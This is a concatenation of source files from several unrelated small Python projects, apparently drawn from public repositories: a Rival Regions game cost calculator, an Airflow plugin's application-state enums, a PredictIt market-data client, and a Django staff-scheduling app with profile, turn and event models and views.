self.ore += round(pow(i * 10, 1.5))
self.gold += round(pow(i * 180, 1.5))
self.diamond += round(pow(i * 10, 0.7))
self.uranium += round(pow(i * 0, 1))
elif self.building.building_id == 6:
for i in range(self.current + 1, build_total + 1):
self.cash += round(pow(i * 2000, 1.5))
self.gold += round(pow(i * 90, 1.5))
self.oil += round(pow(i * 25, 1.5))
self.ore += round(pow(i * 25, 1.5))
self.diamond += round(pow(i * 5, 0.7))
self.uranium += round(pow(i * 20, 1.5))
elif self.building.building_id == 7:
for i in range(self.current + 1, build_total + 1):
self.cash += round(pow(i * 6000, 1.5))
self.gold += round(pow(i * 180, 1.5))
self.oil += round(pow(i * 30, 1.5))
self.ore += round(pow(i * 25, 1.5))
self.diamond += round(pow(i * 10, 0.7))
self.uranium += round(pow(i * 30, 1.5))
elif self.building.building_id == 9:
for i in range(self.current + 1, build_total + 1):
self.cash += round(pow(i * 30, 1.5))
self.gold += round(pow(i * 216, 1.5))
self.oil += round(pow(i * 16, 1.5))
self.ore += round(pow(i * 9, 1.5))
self.diamond += round(pow(i * 0, 1.5))
self.uranium += round(pow(i * 0, 1))
```
#### File: rival_regions_calc/rival_regions_calc/item.py
```python
class Item():
"""Represents an item in Rival Regions"""
item_id = None
name = None
def __init__(self, item):
"""Initialize Resource"""
if isinstance(item, str):
self.item_id = self.items[item]
self.name = item
elif isinstance(item, int):
self.name = self.items_inverse[item]
self.item_id = item
items = {
"cash": 0,
"oil": 2,
"ore": 5,
"gold": 6,
"uranium": 11,
"diamond": 15,
"liquid oxygen": 21,
"helium": 24,
}
items_inverse = {
0: "cash",
2: "oil",
5: "ore",
6: "gold",
11: "uranium",
15: "diamond",
21: "liquid oxygen",
24: "helium",
}
resource_max = {
2: 371,
5: 356,
6: 637,
11: 25,
15: 27,
}
def get_max(self):
"""return max for resource"""
return self.resource_max[self.item_id]
```
#### File: rival_regions_calc/rival_regions_calc/resource_coefficient.py
```python
from . import Item
class ResourceCoefficient():
"""Calculate resource coefficient in working formula"""
resource = None
limit = 0
def calculate(self):
"""Calculate the coefficient"""
return pow(self.limit * self.resource_koef() / 10, 0.8)
def __init__(self, resource, limit):
"""Initialize ResourceCoefficient"""
if not isinstance(resource, Item) or not isinstance(limit, int):
raise TypeError
self.resource = resource
self.limit = limit
def resource_koef(self):
"""Calculate coefficient for resource"""
if self.resource.item_id == 2 or self.resource.item_id == 5:
return 0.65
if self.resource.item_id == 6:
return 0.4
if self.resource.item_id == 11 or self.resource.item_id == 15:
return 0.75
if self.resource.item_id == 21 or self.resource.item_id == 24:
return 0.4
return 0
```
#### File: rival_regions_calc/tests/test_construction_costs.py
```python
from rival_regions_calc import ConstructionCosts, Building
BUILDING = Building("hospital")
CC = ConstructionCosts(BUILDING, 1805)
CC.calculate(50)
def bucks(integer):
"""Format number"""
return '{:,}'.format(integer).replace(',', '.')
print('%17s $' % bucks(CC.cash))
print('%17s G' % bucks(CC.gold))
print('%17s bbl' % bucks(CC.oil))
print('%17s kg' % bucks(CC.ore))
print('%17s pcs.' % bucks(CC.diamond))
print('%17s g' % bucks(CC.uranium))
```
#### File: rival_regions_calc/tests/test_deep_exploration.py
```python
from rival_regions_calc import Item, DeepExploration
resource = Item("oil")
DE = DeepExploration(resource, 223)
DE.calculate_max()
def bucks(integer):
"""Format number"""
return '{:,}'.format(integer).replace(',', '.')
print('%17s $' % bucks(DE.cash))
print('%17s G' % bucks(DE.gold))
print('%17s pcs.' % bucks(DE.diamond))
``` |
{
"source": "jj-ookla/datamechanics_airflow_plugin",
"score": 3
} |
#### File: datamechanics_airflow_plugin/datamechanics_airflow_plugin/application_state.py
```python
from enum import Enum
class SimplifiedApplicationStateType(Enum):
PendingState = "PENDING"
RunningState = "RUNNING"
CompletedState = "COMPLETED"
FailedState = "FAILED"
@property
def is_terminal(self) -> bool:
return self in [
SimplifiedApplicationStateType.CompletedState,
SimplifiedApplicationStateType.FailedState,
]
@property
def is_successful(self) -> bool:
return self == SimplifiedApplicationStateType.CompletedState
class ApplicationStateType(Enum):
NewState = ""
SubmittedState = "SUBMITTED"
RunningState = "RUNNING"
CompletedState = "COMPLETED"
FailedState = "FAILED"
FailedSubmissionState = "SUBMISSION_FAILED"
PendingRerunState = "PENDING_RERUN"
InvalidatingState = "INVALIDATING"
SucceedingState = "SUCCEEDING"
FailingState = "FAILING"
UnknownState = "UNKNOWN"
@property
def simplified(self) -> SimplifiedApplicationStateType:
return _state_mapping[self]
_state_mapping = {
ApplicationStateType.NewState: SimplifiedApplicationStateType.PendingState,
ApplicationStateType.SubmittedState: SimplifiedApplicationStateType.PendingState,
ApplicationStateType.PendingRerunState: SimplifiedApplicationStateType.PendingState,
ApplicationStateType.UnknownState: SimplifiedApplicationStateType.PendingState,
ApplicationStateType.RunningState: SimplifiedApplicationStateType.RunningState,
ApplicationStateType.InvalidatingState: SimplifiedApplicationStateType.RunningState,
ApplicationStateType.SucceedingState: SimplifiedApplicationStateType.RunningState,
ApplicationStateType.FailingState: SimplifiedApplicationStateType.RunningState,
ApplicationStateType.CompletedState: SimplifiedApplicationStateType.CompletedState,
ApplicationStateType.FailedState: SimplifiedApplicationStateType.FailedState,
ApplicationStateType.FailedSubmissionState: SimplifiedApplicationStateType.FailedState,
}
``` |
{
"source": "jjordanbaird/predictit-data",
"score": 3
} |
#### File: predictit-data/predictit_data/predictit.py
```python
import requests
import time
class Predictit():
def __init__(self):
self.pull_data()
self.get_ids()
def _fetch_data(self):
url = 'https://www.predictit.org/api/marketdata/all/'
self.last_pull_time = time.time()
return requests.get(url).json()['markets']
def pull_data(self, ignore_time=False):
if hasattr(self, 'last_pull_time'):
if ignore_time:
self.data = self._fetch_data()
else:
current_time = time.time()
elapsed = current_time - self.last_pull_time
if elapsed >= 60:
print('%s seconds elapsed since last data pull')
print('Pulling fresh data..')
self.data = self._fetch_data()
print('Fresh data collected at %s' % (time.strftime("%H:%M:%S", time.localtime(current_time))))
else:
self.data = self._fetch_data()
def get_ids(self):
self.ids = []
self.parent_ids = []
for parent_market in self.data:
self.parent_ids.append(parent_market['id'])
for sub_market in parent_market['contracts']:
self.ids.append(sub_market['id'])
def get_data_by_id(self, market_id, greedy=False):
# all contracts will return if market_id is a parent market id
if market_id in self.parent_ids:
for market in self.data:
if market['id'] == market_id:
return market
else:
# if market_id is a contract id, only that contract data will return
for parent_market in self.data:
if type(parent_market['contracts']) is dict: # (then only 1 contract available)
if parent_market['contracts']['id'] == market_id:
market = parent_market['contracts']
return market
else:
pass
else:
for sub_contract in parent_market['contracts']:
if sub_contract['id'] == market_id:
if not greedy:
market = parent_market
else:
market = sub_contract
return market
def list_sub_markets(self):
d = {}
for parent_market in self.data:
if type(parent_market['contracts']) is dict:
d[parent_market['contracts']['id']] = parent_market['contracts']['name']
else:
for sub_market in parent_market['contracts']:
d[sub_market['id']] = sub_market['name']
return d
def list_parent_markets(self):
d = {}
for parent_market in self.data:
d[parent_market['id']] = parent_market['name']
return d
``` |
{
"source": "jjordanzlatanov/temperatures",
"score": 3
} |
#### File: jjordanzlatanov/temperatures/main.py
```python
import requests
temperatures = []
def mintemp():
return temperatures[0]
def mediumtemp():
return temperatures[2]
def maxtemp():
return temperatures[4]
data = requests.post('https://tues2022.proxy.beeceptor.com/my/api/test')
for i in data.json()['data']:
temp = i['temperature']
temperatures.append(temp)
temperatures.sort()
``` |
{
"source": "JJorgeDSIC/DRF_Experiments",
"score": 3
} |
#### File: djangorest/api/permissions.py
```python
from rest_framework.permissions import BasePermission
from .models import Recommendation, Profile
class IsOwner(BasePermission):
"""Custom permission class to allow only recommendation owners to edit them."""
def has_object_permission(self, request, view, obj):
"""Return True if permission is granted to the recommendation owner."""
if isinstance(obj, Recommendation):
print(obj.owner)
print(type(obj.owner))
print(request.user)
print(type(request.user))
print(obj.owner == request.user)
return obj.owner == request.user
return obj.owner == request.user
class IsIdentifiedUser(BasePermission):
"""Custom permission class to allow only recommendation owners to edit them."""
def has_object_permission(self, request, view, obj):
"""Return True if permission is granted to the recommendation owner."""
if isinstance(obj, Profile):
print(obj.user)
print(type(obj.user))
print(request.user)
print(type(request.user))
print(obj.user == request.user)
return obj.user == request.user
return obj.user == request.user
```
#### File: djangorest/api/tests.py
```python
from django.test import TestCase
#from .models import Recommendation, User
from django.contrib.auth.models import User
from .models import Recommendation
from rest_framework.test import APIClient
from rest_framework import status
from django.urls import reverse
# Create your tests here.
class ModelTestCase(TestCase):
"""This class defines the test suite for the recommendation model."""
def setUp(self):
"""Define the test client and other test variables."""
self.user = User.objects.create(username="nerd") # ADD THIS LINE
self.title = "Write world class code"
# specify owner of a bucketlist
self.recommendation = Recommendation(title=self.title, owner=self.user) # EDIT THIS TOO
# def setUp(self):
# """Define the test client and other test variables."""
# self.title = "Test Recommendation"
# self.username = "TestUser"
# self.user = User(username="TestUser")
def test_model_can_create_user_and_a_recommendation(self):
"""Test the Recommendation model can create a recommendation."""
old_count = Recommendation.objects.count()
self.recommendation.save()
new_count = Recommendation.objects.count()
self.assertNotEqual(old_count, new_count)
# Define this after the ModelTestCase
class ViewTestCase(TestCase):
"""Test suite for the api views."""
def setUp(self):
"""Define the test client and other test variables."""
self.user = User.objects.create(username="nerd") # ADD THIS LINE
self.client = APIClient()
self.client.force_authenticate(user=self.user)
self.title = "Write world class code"
#self.recommendation = Recommendation(title=self.title)
self.recommendation_data = {'title': 'Go to Ibiza', 'comment': 'Go to Ibiza' ,'reference': 'Go to Ibiza','owner': self.user.id}
self.response = self.client.post(
reverse('create'),
self.recommendation_data,
format="json")
self.recommendation = Recommendation.objects.get(title='Go to Ibiza')
def test_api_can_create_a_recommendation(self):
"""Test the api has recommendation creation capability."""
self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)
def test_api_can_get_a_recommendation(self):
"""Test the api can get a given recommendation."""
recommendation = Recommendation.objects.get()
response = self.client.get(
'/recommendation/',
kwargs={'pk': recommendation.id}, format="json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertContains(response, recommendation)
def test_api_can_delete_recommendation(self):
"""Test the api can delete a recommendation."""
#recommendation = Recommendation.objects.get()
response = self.client.delete(
reverse('details', kwargs={'pk': self.recommendation.id}),
format='json',
follow=True)
self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)
def test_api_can_update_recommendation(self):
"""Test the api can update a given recommendation."""
#recommendation = Recommendation.objects.get()
change_recommendation = {'title': 'Go to Ibiza', 'comment': 'Go to Ibiza' ,'reference': 'Go to Ibiza'}
res = self.client.put(
reverse('details', kwargs={'pk': self.recommendation.id}),
change_recommendation, format='json'
)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_authorization_is_enforced(self):
"""Test that the api has user authorization."""
new_client = APIClient()
res = new_client.get('/recommendation/', kwargs={'pk': 1}, format="json")
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
``` |
{
"source": "JJorgeDSIC/ML_PORTAL_CONCEPT",
"score": 2
} |
#### File: ml_portal/portal/utils.py
```python
import csv
import re
import os
import numpy as np
from django.core.files.storage import default_storage
from django.core.files.base import ContentFile
from django.conf import settings
def get_upload_training_path(instance, filename):
return "{path}/data/train/{filename}".format(path=instance.path, item_id=instance.id,filename=filename)
def get_upload_test_path(instance, filename):
return "{path}/data/test/{filename}".format(path=instance.path, item_id=instance.id,filename=filename)
def validate_csv(data):
#print data
return True
# tmp = os.path.join(settings.MEDIA_ROOT, "tmp", data.name)
# path = default_storage.save(tmp, ContentFile(data.read()))
# print path
# f = open(path, 'r')
# #print re.split(r'[\n\r]+', data)
# data_str = f.read()
# lines = filter(None, re.split("[\n]+", data_str))
# rows = [filter(None, re.split("[,;]+", l)) for l in lines]
# f.close()
# os.remove(path)
# print "SAMPLES: " + str(len(rows))
# print "FIELDS: " + str(len(rows[0]))
# print "SOME SAMPLES: "
# print rows[0:10]
# registers = np.array(rows)
# print registers
# labels = set(registers[:,-1])
# print labels
# f = open(path, 'r')
# lines = f.readlines()
# lines = [l.strip() for l in lines ]
# #print lines
# one_row = filter(None, re.split("[,;]+", lines[0]))
# print "SAMPLES: " + str(len(lines))
# print "FIELDS: " + str(len(one_row))
# print filter(None, re.split("[,;]+", lines[0]))
# f.close()
# os.remove(path)
# reader = csv.reader(data)
# samples = reader.line_num
# print "There are " + str(samples) + " samples."
# for row in reader:
# print row
# for element in row:
# if element == '':
# return False
# f = open(data, 'r')
# lines = f.readlines()
# print lines[0]
#AQUI ME QUEDE
# f = open(data, 'r')
# SEPARATOR =","
# lines = data.split("\n")
# samples = len(lines)
# print "SAMPLES: " + str(samples)
# if samples > 0:
# fields = len(lines[0].split(SEPARATOR))
# print lines[0].split(SEPARATOR)
# print "FIELDS: " + str(fields)
# for line in lines:
# print line[:-1]
# tokens = line[:-1].split(SEPARATOR)
# for token in tokens:
# print token
# if token == '':
# return False
#return True
``` |
{
"source": "JJorgeDSIC/ShellMatrixExampleSLEPc4py",
"score": 2
} |
#### File: ShellMatrixExampleSLEPc4py/code/shell_matrix_example_phi1.py
```python
import sys, slepc4py
slepc4py.init(sys.argv)
from petsc4py import PETSc
from slepc4py import SLEPc
import numpy as np
Print = PETSc.Sys.Print
class ShellMatrix(object):
def __init__(self, m, n, KL11, KL21, KL22, L21, L22, M11, M12):
self.m, self.n = m, n
scalar = PETSc.ScalarType
self.KL11 = KL11
self.KL21 = KL21
self.KL22 = KL22
self.L21 = L21
self.L22 = L22
self.M11 = M11
self.M12 = M12
self.workvec1, _ = L22.createVecs()
self.workvec2, _ = L22.createVecs()
self.workvec1.set(0)
self.workvec2.set(0)
def mult(self, A, x, y):
"""
First version: isolating \Phi_1
"""
m, n = self.m, self.n
w1 = self.M12 * x
w2 = self.L22 * x
self.KL21.solve(w2, self.workvec1)
w4 = self.M11 * self.workvec1
w5 = w1 + w4
self.KL11.solve(w5, self.workvec2)
w7 = self.L21 * self.workvec2
self.KL22.solve(w7, y)
def construct_operator(m, n, KL11, KL21, KL22, L21, L22, M11, M12):
# Create shell matrix
context = ShellMatrix(m,n, KL11, KL21, KL22, L21, L22, M11, M12)
A = PETSc.Mat().createPython([m,n], context)
A.setUp()
return A
def solve_eigensystem(A, problem_type=SLEPc.EPS.ProblemType.NHEP):
# Create the result vectors
xr, xi = A.createVecs()
# Setup the eigensolver
E = SLEPc.EPS().create()
E.setOperators(A,None)
E.setDimensions(3,PETSc.DECIDE)
E.setProblemType( problem_type )
E.setFromOptions()
# Solve the eigensystem
E.solve()
Print("")
its = E.getIterationNumber()
Print("Number of iterations of the method: %i" % its)
sol_type = E.getType()
Print("Solution method: %s" % sol_type)
nev, ncv, mpd = E.getDimensions()
Print("Number of requested eigenvalues: %i" % nev)
tol, maxit = E.getTolerances()
Print("Stopping condition: tol=%.4g, maxit=%d" % (tol, maxit))
nconv = E.getConverged()
Print("Number of converged eigenpairs: %d" % nconv)
if nconv > 0:
Print("")
Print(" k ||Ax-kx||/||kx|| ")
Print("----------------- ------------------")
for i in range(nconv):
k = E.getEigenpair(i, xr, xi)
error = E.computeError(i)
if k.imag != 0.0:
Print(" %9f%+9f j %12g" % (k.real, k.imag, error))
else:
Print(" %12f %12g" % (k.real, error))
Print("")
def main():
opts = PETSc.Options()
# load from file
viewer = PETSc.Viewer().createBinary('../matrices/ringhals1.petsc', 'r')
L11 = PETSc.Mat().load(viewer)
L22 = PETSc.Mat().load(viewer)
L21 = PETSc.Vec().load(viewer)
M11 = PETSc.Vec().load(viewer)
M12 = PETSc.Vec().load(viewer)
# create linear solver
KL11 = PETSc.KSP()
KL11.create(PETSc.COMM_WORLD)
# use conjugate gradients
KL11.setType('cg')
# and incomplete Cholesky
KL11.getPC().setType('none')
# obtain sol & rhs vectors
KL11.setOperators(L11)
KL11.setFromOptions()
((lr,gr),(lc,gc)) = L11.getSizes()
L21mat = PETSc.Mat();
L21mat.createAIJ(size=L11.getSizes());
L21mat.setFromOptions()
L21mat.setUp()
L21mat.setDiagonal(L21)
L21mat.assemble()
# To fix...
# # create linear solver
KL21 = PETSc.KSP()
KL21.create(PETSc.COMM_WORLD)
# use conjugate gradients
KL21.setType('cg')
# and incomplete Cholesky
KL21.getPC().setType('none')
# obtain sol & rhs vectors
KL21.setOperators(L21mat)
KL21.setFromOptions()
# create linear solver
KL22 = PETSc.KSP()
KL22.create(PETSc.COMM_WORLD)
# use conjugate gradients
KL22.setType('cg')
# and incomplete Cholesky
KL22.getPC().setType('none')
# obtain sol & rhs vectors
KL22.setOperators(L22)
KL22.setFromOptions()
Print("gr={:}\n".format(gr))
Print("gc={:}\n".format(gc))
Print("lr={:}\n".format(lr))
Print("lc={:}\n".format(lc))
Print("Standard Non-Symmetric Eigenvalue Problem (matrix-free)")
A = construct_operator(gr,gc, KL11, KL21, KL22, L21, L22, M11, M12)
solve_eigensystem(A)
if __name__ == '__main__':
main()
``` |
{
"source": "jjorgewill/schedule",
"score": 2
} |
#### File: apps/core/models.py
```python
import calendar
import datetime
from django.db.models import Q, Sum
from django.db.models.signals import post_save
from django.dispatch import receiver
from model_utils.models import SoftDeletableModel, TimeStampedModel
from schedule.settings import MEDIA_URL
from django.contrib.auth.models import User, Permission
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import smart_str
def get_path_avatar(instance, filename):
return "upload/{0}/avatar/{1}".format(instance.id, smart_str(filename))
class Profession(TimeStampedModel, SoftDeletableModel):
name = models.CharField(max_length=200)
abbreviation = models.CharField(max_length=10)
class Meta:
verbose_name = _("Profession")
verbose_name_plural = _("Professions")
def __str__(self):
return self.name
class Profile(TimeStampedModel, SoftDeletableModel):
user = models.OneToOneField(User, blank=True, null=True, on_delete=models.CASCADE)
phone = models.CharField(max_length=15, blank=True, null=True)
color = models.CharField(max_length=7, blank=True, null=True)
admin = models.NullBooleanField()
avatar = models.FileField(blank=True, null=True, upload_to=get_path_avatar)
profession = models.ForeignKey(Profession, blank=True, null=True, on_delete=models.SET_NULL)
class Meta:
verbose_name = _("Profile")
verbose_name_plural = _("Profiles")
def __str__(self):
if self.user and self.user.first_name:
if self.profession:
return self.profession.abbreviation + ' ' + self.user.first_name
else:
return self.user.first_name
else:
return str(self.id)
def get_time_after_today(self,today):
day = datetime.datetime.now().day
last_day = calendar.monthrange(today.year,today.month)[1]
hours_next = self.event_set.filter(date__month=today.month,
date__year=today.year,
date__day__lte=last_day,
date__day__gte=day,
is_removed=False).distinct().aggregate(
Sum('duration_hours'),Sum('duration_minutes'))
return hours_next
def get_time_before_today(self, today):
day = today.day
hours_before = self.event_set.filter(date__month=today.month,
date__year=today.year,
date__day__lte=day,
date__day__gte=1,
is_removed=False).distinct().aggregate(
Sum('duration_hours'),Sum('duration_minutes'))
return hours_before
def get_time_per_month(self, today):
events_hours = self.event_set.filter(date__month=today.month,
date__year=today.year,
is_removed=False).distinct().aggregate(
Sum('duration_hours'),Sum('duration_minutes'))
return events_hours
def get_time_after_today_per_turn(self,today):
day = datetime.datetime.now().day
last_day = calendar.monthrange(today.year,today.month)[1]
hours_next = self.event_set.filter(date__month=today.month,
date__year=today.year,
date__day__lte=last_day,
date__day__gte=day,
is_removed=False).values('turn__name').annotate(
Sum('duration_hours'),Sum('duration_minutes'))
return hours_next
def get_time_before_today_per_turn(self, today):
day = today.day
hours_before = self.event_set.filter(date__month=today.month,
date__year=today.year,
date__day__lte=day,
date__day__gte=1,
is_removed=False).values('turn__name').annotate(
Sum('duration_hours'),Sum('duration_minutes'))
return hours_before
def get_time_per_month_per_turn(self, today):
events_hours = self.event_set.filter(date__month=today.month,
date__year=today.year,
is_removed=False).values('turn__name').annotate(
Sum('duration_hours'),Sum('duration_minutes'))
return events_hours
@property
def get_avatar(self):
if not self.avatar:
return '/static/app/img/no_user.jpg'
else:
return MEDIA_URL + str(self.avatar)
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
profile = Profile.objects.create(user=instance)
# can_dashboard = Permission.objects.get(codename='can_dashboard')
# can_inbox = Permission.objects.get(codename='can_inbox')
# profile.user.user_permissions.add(can_dashboard)
# profile.user.user_permissions.add(can_inbox)
class Hour(TimeStampedModel, SoftDeletableModel):
start_time = models.TimeField()
end_time = models.TimeField(blank=True, null=True)
class Meta:
verbose_name = _("Hour")
verbose_name_plural = _("Hours")
def __str__(self):
return str(self.start_time)
@property
def as_dict(self):
return {
'start_time': self.start_time,
'end_time': self.end_time
}
@property
def get_amount_time(self):
if self.end_time:
end = datetime.timedelta(hours=self.end_time.hour, minutes=self.end_time.minute)
start = datetime.timedelta(hours=self.start_time.hour, minutes=self.start_time.minute)
return end - start
else:
return 0
class Turn(TimeStampedModel, SoftDeletableModel):
name = models.CharField(max_length=100) # noche,tarde,manana
hour = models.ForeignKey(Hour, blank=True, null=True, on_delete=models.SET_NULL)
duration_hours = models.IntegerField(blank=True, null=True)
duration_minutes = models.IntegerField(blank=True, null=True)
class Meta:
verbose_name = _("Turn")
verbose_name_plural = _("Turns")
ordering = ['hour__start_time']
def __str__(self):
return self.name
@property
def get_amount_hours(self):
return self.duration_hours
@property
def get_amount_minutes(self):
return self.duration_minutes
class Status(models.Model):
name = models.CharField(max_length=100) # planificado,trabajado
class Meta:
verbose_name = _("Status")
verbose_name_plural = _("Statuses")
def __str__(self):
return self.name
class Event(TimeStampedModel, SoftDeletableModel):
date = models.DateField()
turn = models.ForeignKey(Turn, blank=True, null=True, on_delete=models.SET_NULL)
status = models.ForeignKey(Status, on_delete=models.CASCADE, blank=True, null=True) # programed, plaint
profile = models.ForeignKey(Profile, on_delete=models.CASCADE)
duration_hours = models.IntegerField(blank=True, null=True)
duration_minutes = models.IntegerField(blank=True, null=True)
class Meta:
verbose_name = _("Event")
verbose_name_plural = _("Events")
def __str__(self):
return str(self.date_start) + ' ' + self.profile.user.first_name
class Holiday(TimeStampedModel, SoftDeletableModel):
day = models.DateField()
class Meta:
verbose_name = _("Holiday")
verbose_name_plural = _("Holidays")
def __str__(self):
return str(self.day)
class NonWorkingDay(TimeStampedModel, SoftDeletableModel):
name = models.CharField(max_length=20)
number_day = models.IntegerField()
class Meta:
verbose_name = _("NonWorkingDay")
verbose_name_plural = _("NonWorkingDays")
def __str__(self):
return self.name
class MotiveAffectation(models.Model):
name = models.CharField(max_length=150)
class Meta:
verbose_name = _("MotiveAffectation")
verbose_name_plural = _("MotiveAffectations")
def __str__(self):
return self.name
class Affectation(TimeStampedModel, SoftDeletableModel):
hour = models.ForeignKey(Hour, blank=True, null=True, on_delete=models.SET_NULL)
motive = models.ForeignKey(MotiveAffectation, blank=True, null=True, on_delete=models.SET_NULL)
comment = models.TextField(blank=True, null=True)
class Feature(models.Model):
menu_item_name = models.CharField(verbose_name=_('Item Name'), max_length=100)
url = models.CharField(verbose_name=_('Url'), max_length=100)
icon = models.CharField(verbose_name=_('Icon'), max_length=100)
position = models.PositiveIntegerField(verbose_name=_('Position'), blank=True, null=True)
child = models.ForeignKey('self', related_name='child_feature', on_delete=models.SET_NULL, blank=True, null=True)
permission = models.ManyToManyField(Permission)
class Meta:
verbose_name = _("Feature")
verbose_name_plural = _("Features")
def __str__(self):
return self.menu_item_name
```
#### File: apps/core/views.py
```python
from datetime import timedelta
from django.utils import timezone
from django.contrib import messages
from django.contrib.auth.models import User
from django.db.models import Q
from django.http import HttpResponseRedirect, JsonResponse
from django.shortcuts import render
from django.urls import reverse
from django.views import generic
from apps.core import models, forms
from django.utils.translation import ugettext_lazy as _
from apps.core.mixin import Security
from apps.core.utils import generate, date_range
from schedule.settings import EMAIL_HOST_USER
class RouterView(Security, generic.RedirectView):
pattern_name = 'view_dashboard'
def get_redirect_url(self, *args, **kwargs):
profile = self.request.user.profile
if profile.admin:
return HttpResponseRedirect(reverse('view_dashboard'))
elif profile.admin:
return HttpResponseRedirect(reverse('view_dashboard'))
else:
return super().get_redirect_url(*args, **kwargs)
# Event
class CalendarView(Security, generic.CreateView):
template_name = 'events/form_event.html'
form_class = forms.EventForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
profiles = models.Profile.objects.filter(is_removed=False).exclude(user__is_staff=True).order_by('-id')
info_profile = []
today = timezone.now()
for p in profiles:
hour = p.get_time_per_month(today)
before = p.get_time_before_today(today)
last = p.get_time_after_today(today)
time_after_today_per_turn = p.get_time_after_today_per_turn(today)
time_before_today_per_turn = p.get_time_before_today_per_turn(today)
time_per_month_per_turn = p.get_time_per_month_per_turn(today)
if hour['duration_hours__sum'] and before['duration_hours__sum']:
percent = int(float(before['duration_hours__sum']) * float(hour['duration_hours__sum']) / 100)
else:
percent = 0
info_profile.append({'hours': hour['duration_hours__sum'],'minutes':hour['duration_minutes__sum'],
'name':p.user.first_name,'last_name':p.user.last_name,
'color':p.color,
'percent':percent,
'time_after_today_per_turn':time_after_today_per_turn,
'time_before_today_per_turn':time_before_today_per_turn,
'time_per_month_per_turn':time_per_month_per_turn,
'hour_before_day': before['duration_hours__sum'],'minutes':before['duration_minutes__sum'],
'hour_last_day':last['duration_hours__sum'],'minutes':last['duration_minutes__sum'],
})
context['profiles'] = info_profile
return context
def form_valid(self, form):
obj_event = form.save(commit=False)
date_start = form.cleaned_data.get('date_start')
date_end = form.cleaned_data.get('date_end')
turn = form.cleaned_data.get('turn')
profile = form.cleaned_data.get('profile')
next_day = date_start + timedelta(1)
if next_day != date_end:
list_event = []
for day in date_range(date_start, date_end):
event = models.Event()
event.date = day
event.turn = turn
event.profile = profile
event.duration_hours = turn.duration_hours
event.duration_minutes = turn.duration_minutes
list_event.append(event)
if list_event:
models.Event.objects.bulk_create(list_event)
else:
event = models.Event()
event.date = date_start
event.turn = turn
event.profile = profile
event.duration_hours = turn.duration_hours
event.duration_minutes = turn.duration_minutes
event.save()
messages.success(self.request, _('This event has been save'))
return HttpResponseRedirect(self.get_success_url())
def get_success_url(self):
return reverse('create_calendar')
# Turns
class TurnsCreateView(Security, generic.CreateView):
template_name = 'turns/form_turn.html'
# permission_required = 'core.can_create_turns'
form_class = forms.TurnForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
def form_valid(self, form):
turn = form.save(commit=False)
hour = form.cleaned_data.get('hour')
duracion = str(hour.get_amount_time).split(":")
turn.duration_hours = duracion[0]
turn.duration_minutes = duracion[1]
turn.save()
messages.success(self.request, _('This turn has been save'))
return HttpResponseRedirect(self.get_success_url())
def get_success_url(self):
return reverse('create_turns')
class TurnsView(Security, generic.ListView):
template_name = 'turns/view_turn.html'
model = models.Turn
context_object_name = 'turns'
class GetTurnsView(Security, generic.ListView):
template_name = 'turns/view_turn.html'
model = models.Turn
context_object_name = 'turns'
def get(self, request, *args, **kwargs):
date = request.GET.get('date').split('-')
year = int(date[1])
month = int(date[0])
events = models.Event.objects.filter(date__month=month,
date__year=year, is_removed=False).distinct()
data = []
for obj in events:
abbreviation = obj.profile.profession.abbreviation if obj.profile.profession else ""
data.append({
'title': obj.turn.name + " " + abbreviation + " " + obj.profile.user.first_name,
'start': obj.date.strftime('%Y-%m-%d'),
'end': obj.date.strftime('%Y-%m-%d'),
'color': obj.profile.color,
'profile': obj.profile.id,
'id': obj.id,
})
return JsonResponse({'status': True, 'data': data})
# Profile
class ProfilesCreateView(Security, generic.CreateView):
template_name = 'profiles/form_profile.html'
# permission_required = 'core.can_view_clients'
form_class = forms.ProfileForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
profile = self.request.user.profile
context.update({'title': _("Create profile")})
context.update(
{'profiles': models.Profile.objects.filter(is_removed=False).exclude(user__is_staff=True).order_by('-id')
.exclude(id=profile.id)})
return context
def form_valid(self, form):
obj_form = form.save(commit=False)
email = form.data.get('email')
user = User.objects.filter(email=email).first()
if not user:
user = User()
user.first_name = form.data.get('first_name')
user.last_name = form.data.get('last_name')
user.email = email
user.username = email
password = <PASSWORD>()
user.set_password(password)
user.save()
# add_permission_customer(user)
# send_mail('backend/email/create_user.tpl', {'password': password, 'user': email,
# 'accountant': self.request.user.first_name},
# EMAIL_HOST_USER, [form.data.get('email')])
profile = models.Profile.objects.get(user__email=email)
profile.phone = form.cleaned_data.get('phone')
profile.profession = form.cleaned_data.get('profession')
profile.avatar = form.files.get('avatar')
profile.color = form.cleaned_data.get('color')
profile.save()
messages.success(self.request, _('This profile has been save'))
return HttpResponseRedirect(self.get_success_url())
def form_invalid(self, form):
messages.error(self.request, _('We are sorry, their attributes required your atention'))
return self.render_to_response(self.get_context_data(form=form))
def get_success_url(self):
return reverse('create_profiles')
class ProfilesUpdateView(Security, generic.UpdateView):
template_name = 'profiles/form_profile.html'
model = models.Profile
# permission_required = 'core.can_view_clients'
form_class = forms.ProfileForm
def get_initial(self):
profile = self.object
return {
'first_name': self.object.user.first_name,
'last_name': self.object.user.last_name,
'phone': self.object.phone,
'email': self.object.user.email,
}
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
profile = self.request.user.profile
context.update({'title': _("Create profile")})
context.update(
{'profiles': models.Profile.objects.filter(is_removed=False).exclude(user__is_staff=True).order_by('-id')
.exclude(id=profile.id)})
return context
def form_valid(self, form):
obj_form = form.save(commit=False)
email = form.data.get('email')
user = User.objects.filter(email=email).first()
if user:
user.first_name = form.data.get('first_name')
user.last_name = form.data.get('last_name')
user.email = email
user.username = email
user.save()
profile = models.Profile.objects.get(user__email=email)
profile.phone = form.cleaned_data.get('phone')
profile.profession = form.cleaned_data.get('profession')
profile.avatar = form.files.get('avatar')
profile.color = form.cleaned_data.get('color')
profile.save()
messages.success(self.request, _('This profile has been save'))
return HttpResponseRedirect(self.get_success_url())
def form_invalid(self, form):
messages.error(self.request, _('We are sorry, their attributes required your atention'))
return self.render_to_response(self.get_context_data(form=form))
def get_success_url(self):
return reverse('update_profiles', kwargs={'pk': self.kwargs.get('pk')})
